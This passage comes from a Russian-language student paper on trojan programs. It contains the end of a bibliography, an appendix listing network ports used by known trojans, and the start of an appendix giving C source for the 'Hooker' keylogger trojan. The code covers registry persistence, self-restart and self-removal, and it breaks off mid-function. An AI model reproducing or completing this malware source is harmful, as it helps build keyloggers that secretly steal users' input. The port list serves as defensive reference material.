p align="left">4. Харви М. Дейтел, Дейтел П. Дж., Чофнес Д.Р. Операционные системы. Распределенные системы, сети, безопасность -М.: Бином. Лаборатория знаний, 2006 5. Вебер К., Бадур Г. Безопасность в Windows XP. Готовые решения сложных задач защиты компьютеров. - М.: Diasoft, 2003, 464 с. 6. Хатч, Брайан, Ли, Джеймс, Курц, Джордж Секреты хакеров. Безопасность Linux - готовые решения, 2-е издание, - М.: Издательский дом "Вильямс", 2004, 704 с 7. Скудис Э. Противостояние хакерам: Пошаговое руководство по компьютерным атакам и эффективной защите: Пер. с англ., - М.: ДМК-Пресс, 2003, 512 с 8. http://www.bezpeka.com/ru/news/2005/07/22/4850.html 9. http://www.safensoft.ru/safensec/personal/ 10. http://www.xndits.ru/index. php? module=articles&c=articles&b=1&a=32 11. http://www.kuban.ru/help/troyan. htm 12. www.cnews.ru 13. www.viruslist.comruvirusesencyclopediavirusid=34631 14. ru. wikipedia.org 15. http://www.tehnostar.com/newshard/16085.html 16. http://www.hackzona.ru/hz. php? name=News&file=article&sid=3262 17. http://www.compress.ru/Archive/CP/2006/3/81/ Приложение 1Список портов, используемых троянскими программами:port 21 - Back Construction, Blade Runner, Doly Trojan, Fore, FTP trojan, Invisible FTP, Larva, MBT, Motiv, Net Administrator, Senna Spy FTP Server, WebEx, WinCrashport 23 - Tiny Telnet Server, Truva Atlport 25 - Aji, Antigen, Email Password Sender, Gip, Happy 99, I Love You, Kuang 2, Magic Horse, Moscow Email Trojan, Naebi, NewApt, ProMail trojan, Shtrilitz, Stealth, Tapiras, Terminator, WinPC, WinSpyport 31 - Agent 31, Hackers Paradise, Masters Paradise port 41 - DeepThroatport 48 - DRAT port 50 - DRATport 59 - DMSetup port 79 - Firehotckerport 80 - Back End, Executor, Hooker, RingZero port 99 - Hidden Portport 110 - ProMail trojan port 113 - Invisible Identd Deamon, Kazimasport 119 - Happy 99 port 121 - JammerKillahport 123 - Net Controller port 133 - Farnaz, port 146 - Infectorport 146 (UDP) - Infector port 170 - A-trojanport 421 - TCP Wrappers port 456 - Hackers Paradiseport 531 - Rasminport 555 - Ini-Killer, NeTAdministrator, Phase Zero, Stealth Spyport 606 - Secret Serviceport 666 - Attack FTP, Back Construction, NokNok, Cain & Abel, Satanz Backdoor, ServeU, Shadow Phyreport 667 - SniperNet port 669 - DP Trojanport 692 - GayOL port 777 - Aim Spyport 808 - WinHole port 911 - Dark Shadowport 999 - DeepThroat, WinSatan port 1000 - Der Spacher 3port 1001 - Der Spacher 3, Le Guardien, Silencer, WebExport 1010 - Doly Trojan port 1011 - Doly Trojan port 1255 - Scarabport 1256 - Project nEXT port 1269 - Mavericks Matrixport 1313 - NETrojan port 1338 - Millenium Wormport 1349 (UDP) - BO DLL port 1492 - FTP99CMPport 1509 - Psyber Streaming Server port 1524 - Trinooport 1600 - Shivka-Burka port 1777 - Scarabport 1807 - SpySender port 1966 - Fake FTPport 1969 - OpC BO port 1981 - Shockraveport 1999 - BackDoor, TransScout port 1012 - Doly Trojanport 1015 - Doly Trojan port 1016 - Doly Trojanport 1020 - Vampire port 1024 - NetSpyport 1042 - Bla port 1045 - Rasminport 1050 - MiniCommand port 1080 - WinHoleport 1081 - WinHole port 1082 - WinHoleport 1083 - WinHole port 1090 - Xtremeport 1095 - RAT port 1097 - RATport 1098 - RAT port 1099 - BFevolution, RATport 1170 - Psyber Stream Server, Streaming Audio trojan, Voiceport 1200 (UDP) - NoBackO port 1201 (UDP) - NoBackOport 1207 - SoftWAR port 1212 - Kaosport 1225 - Scarab port 1234 - Ultors Trojanport 1243 - BackDoor-G, SubSeven, SubSeven Apocalypse, Tilesport 1245 - VooDoo Dollport 2000 - Der Spaeher 3, Insane Network, TransScoutport 2001 - Der Spaeher 3, TransScout, Trojan Cowport 2002 - TransScout port 2003 - TransScoutport 2004 - TransScout port 2005 - TransScoutport 2023 - Ripper port 2080 - WinHoleport 2115 - Bugs port 2140 - Deep Throat, The Invasorport 2155 - Illusion Mailer port 2283 - HVL Rat5port 2300 - Xplorer port 2565 - Strikerport 2583 - WinCrash port 2600 - Digital RootBeerport 2716 - The Prayer port 2773 - SubSevenport 2801 - Phineas Phucker port 3000 - Remote Shutdownport 3024 - WinCrash port 3128 - RingZeroport 3129 - Masters Paradise port 3150 - Deep Throat, The Invasorport 3456 - Teror Trojan port 3459 - Eclipse 2000, Sanctuaryport 3700 - Portal of Doom port 3791 - Eclypseport 3801 (UDP) - Eclypse port 4000 - Skydanceport 4092 - WinCrash port 4242 - Virtual hacking Machineport 4321 - BoBo port 4444 - Prosiak, Swift remoteport 4567 - File Nail port 4590 - ICQTrojanport 5000 - Bubbel, Back Door Setup, Sockets de Troie port 5001 - Back Door Setup, Sockets de Troieport 5010 - Solo port 5011 - One of the Last Trojans (OOTLT)port 5031 - NetMetropolitan port 5031 - NetMetropolitanport 5321 - Firehotcker port 5343 - wCratport 5400 - Blade Runner, Back Construction port 5401 - Blade Runner, Back Constructionport 5402 - Blade Runner, Back Construction port 5550 - Xtcpport 5512 - Illusion Mailer port 5555 - ServeMeport 5556 - BO Facil port 5557 - BO Facilport 5569 - Robo-Hack port 5637 - PC Crasherport 5638 - PC Crasher port 5742 - WinCrashport 5882 (UDP) - Y3K RAT port 5888 - Y3K RATport 6000 - The Thing port 6006 - The Thingport 6272 - Secret Service port 6400 - The Thingport 6667 - Schedule Agent port 6669 - Host Control, Vampyreport 6670 - DeepThroat, BackWeb Server, WinNuke eXtreameport 6711 - SubSeven port 6712 - Funny Trojan, SubSevenport 6713 - SubSeven port 6723 - Mstreamport 6771 - DeepThroat port 6776 - 2000 Cracks, BackDoor-G, SubSevenport 6838 (UDP) - Mstream port 6912 - Shit Heep (not port 69123!)port 6939 - Indoctrinationport 6969 - GateCrasher, Priority, IRC 3, NetController port 6970 - GateCrasherport 7000 - Remote Grab, Kazimas, SubSeven port 7001 - Freak88port 7215 - SubSeven port 7300 - NetMonitorport 7301 - NetMonitor port 7306 - NetMonitorport 7307 - NetMonitor port 7308 - NetMonitorport 7424 - Host Control port 7424 (UDP) - Host Controlport 7789 - Back Door Setup, ICKiller port 7983 - Mstreamport 8080 - RingZero port 8787 - Back Orifice 2000port 8897 - HackOffice port 8988 - BacHackport 8989 - Rcon port 9000 - Netministratorport 9325 (UDP) - Mstream port 9400 - InCommandport 9872 - Portal of Doom port 9873 - Portal of Doomport 9874 - Portal of Doom port 9875 - Portal of Doomport 9876 - Cyber Attacker, RUX port 9878 - TransScoutport 9989 - iNi-Killer port 9999 - The Prayerport 10067 (UDP) - Portal of Doom port 10085 - Syphillisport 10086 - Syphillis port 10101 - BrainSpyport 10167 (UDP) - Portal of Doom port 10528 - Host Controlport 10520 - Acid Shivers port 10607 - Comaport 10666 (UDP) - Ambush port 11000 - Senna Spyport 11050 - Host Control port 11051 - Host Controlport 11223 - Progenic trojan, Secret Agent port 12076 - Gjamerport 12223 - Hack+99 KeyLoggerport 12345 - GabanBus, My Pics, NetBus, Pie Bill Gates, Whack Job, X-billport 12346 - GabanBus, NetBus, X-bill port 12349 - BioNetport 12361 - Whack-a-mole port 12362 - Whack-a-moleport 12623 (UDP) - DUN Control port 12624 - Buttmanport 12631 - WhackJob port 12754 - Mstreamport 13000 - Senna Spy port 13010 - Hacker Brazilport 15092 - Host Control port 15104 - Mstreamport 16660 - Stacheldracht port 16484 - Mosuckerport 16772 - ICQ Revenge port 16969 - Priorityport 17166 - Mosaic port 17300 - Kuang2 The Virusport 17777 - Nephron port 18753 (UDP) - Shaftport 19864 - ICQ Revenge port 20001 - Millenniumport 20002 - AcidkoR port 20034 - NetBus 2 Pro, NetRex, Whack Jobport 20203 - Chupacabra port 20331 - Blaport 20432 - Shaft port 20432 (UDP) - Shaftport 21544 - GirlFriend, Kidterror, Schwindler, WinSp00fer port 22222 - Prosiakport 23023 - Logged port 23432 - Asylumport 23456 - Evil FTP, Ugly FTP, Whack Job port 23476 - Donald Dickport 23476 (UDP) - Donald Dick port 23477 - Donald Dickport 26274 (UDP) - Delta Source port 26681 - Spy Voiceport 27374 - SubSeven port 27444 (UDP) - Trinooport 27573 - SubSeven port 27665 - Trinooport 29104 - Host Control port 29891 (UDP) - The Unexplainedport 30001 - TerrOr32 port 30029 - AOL Trojanport 30100 - NetSphere port 30101 - NetSphereport 30102 - NetSphere port 30103 - NetSphereport 30103 (UDP) - NetSphere port 30133 - NetSphereport 30303 - Sockets de Troie port 30947 - Intruseport 30999 - Kuang2 port 31335 (UDP) - Trinooport 31336 - Bo Whack, ButtFunnel port 31337 - Baron Night, BO client, BO2, Bo Facilport 31337 (UDP) - BackFire, Back Orifice, DeepBO, Freak>port 31338 - NetSpy DK, ButtFunnel port 31338 (UDP) - Back Orifice, DeepBOport 31339 - NetSpy DK port 31666 - BOWhackport 31785 - Hack+a+Tack port 31787 - Hack+a+Tackport 31788 - Hack+a+Tack port 31789 (UDP) - Hack+a+Tackport 31791 (UDP) - Hack+a+Tack port 31792 - Hack+a+Tackport 32100 - Peanut Brittle, Project nEXT port 32418 - Acid Batteryport 33333 - Blakharaz, Prosiak port 33577 - PsychWardport 33777 - PsychWard port 33911 - Spirit 2001aport 34324 - BigGluck, TN port 34555 (UDP) - Trinoo (Windows)port 35555 (UDP) - Trinoo (Windows) port 37651 - YATport 40412 - The Spy port 40421 - Agent 40421, Masters Paradiseport 40422 - Masters Paradise port 40423 - Masters Paradiseport 40426 - Masters Paradise port 41666 - Remote Bootport 41666 (UDP) - Remote Boot port 44444 - Prosiakport 47262 (UDP) - Delta Source port 50505 - Sockets de Troieport 50766 - Fore, Schwindler port 51996 - Cafeiniport 52317 - Acid Battery 2000 port 53001 - Remote Windows Shutdownport 54283 - SubSeven port 54320 - Back Orifice 2000port 54321 - School Bus port 54321 (UDP) - Back Orifice 2000port 57341 - NetRaider port 58339 - ButtFunnelport 60000 - Deep Throat port 60068 - Xzip 6000068port 60411 - Connection port 61348 - Bunker-Hillport 61466 - Telecommando port 61603 - Bunker-Hillport 63485 - Bunker-Hill port 65000 - Devil, Stacheldrachtport 65432 - The Traitor port 65432 (UDP) - The Traitorport 65535 - RCПРИЛОЖЕНИЕ 2Исходный текст троянца Нооker#include "hooker. h"#include "logfunc. h"#include "common. h"#include "lzw. h" // ------------ - путь в реестре---------------------HKEY GetRegKey (const char* s,char* r){const char* szRoots [] = {"HKEY_CLASSES_ROOT","HKEY_CURRENT_USER","HKEY_LOCAL_MACHINE","HKEY_USERS"};const HKEY hKeys [] = {HKEY_CLASSES_ROOT,HKEY_CURRENT_USER,HKEY_LOCAL_MACHINE,HKEY_USERS};int i;for (i=0; i<4; i++)if (! strncmp (s, szRoots [i], strlen (szRoots [i]))) {strcpy (r, s + strlen (szRoots [i]) + 1);return hKeys [i];};return NULL;}; // --------------Повторный запуск программы при необходимости--------------void RecurrentStart (void){char *szCmd,sz1 [0x100],sz2 [0x100];PROCESS_INFORMATION pi;STARTUPINFO si;szCmd = GetCommandLine ();sprintf (sz1,"Restart_%X",sti. number);if (! strstr (szCmd,sz1)) { // Это первая копия процесса, сделать вторуюmemset (&si,0,sizeof (si));si. cb = sizeof (si);GetModuleFileName (NULL,sz2,sizeof (sz2)); // Создаем процессCreateProcess (sz2, // pointer to name of executable modulesz1, // pointer to command line stringNULL, // pointer to process security attributesNULL, // pointer to thread security attributesfalse, // handle inheritance flag0, // creation flagsNULL, // pointer to new environment blockNULL, // pointer to current directory name&si, // pointer to STARTUPINFO&pi // pointer to PROCESS_INFORMATION);ExitProcess (0);};}; // ----------------------------Деинсталяция----------------------------void AutoKill (HINSTANCE h_keylog){HKEY hKey,hRoot;char sz1 [0x100];EnterCriticalSection (&gcs); // вход реестреhRoot = GetRegKey (sti. reg_path,sz1);if (hRoot) {RegOpenKeyEx (hKey, // handle of open keysz1, // address of name of subkey to open0, // reservedKEY_ALL_ACCESS, // security access mask&hKey // address of handle of open key);RegDeleteValue (hKey,sti. reg_desc);RegCloseKey (hKey);}; // Удаляем логDeleteFile (sti. logname); // Удаляем keylog dllGetModuleFileName (h_keylog,sz1,sizeof (sz1));FreeLibrary (h_keylog);DeleteFile (sz1); // Adieu!ExitProcess (0);}; // ----------------------Установка в реестре---------------------------void RegInstall (void){HKEY hKey,hRoot;ULONG i,j;char buf1 [0x100],buf2 [0x100];hRoot = GetRegKey (sti. reg_path,buf1);if (! hRoot) hRoot = HKEY_LOCAL_MACHINE;if (RegCreateKeyEx (hRoot, // handle of an open keybuf1, // address of subkey name0, // reserved"", // address of class stringREG_OPTION_NON_VOLATILE, // special options flagKEY_ALL_ACCESS, // desired security accessNULL, // address of key security structure&hKey, // address of buffer for opened handle&i // address of disposition value buffer) ! = ERROR_SUCCESS) return;i = sizeof (buf1);if (sti. fullname)strcpy (buf2,sti. full_exe_name);elsestrcpy (buf2,sti. exe_name);if ( (RegQueryValueEx (hKey, // handle of key to querysti. reg_desc, // address of name of value to query
Страницы: 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12
|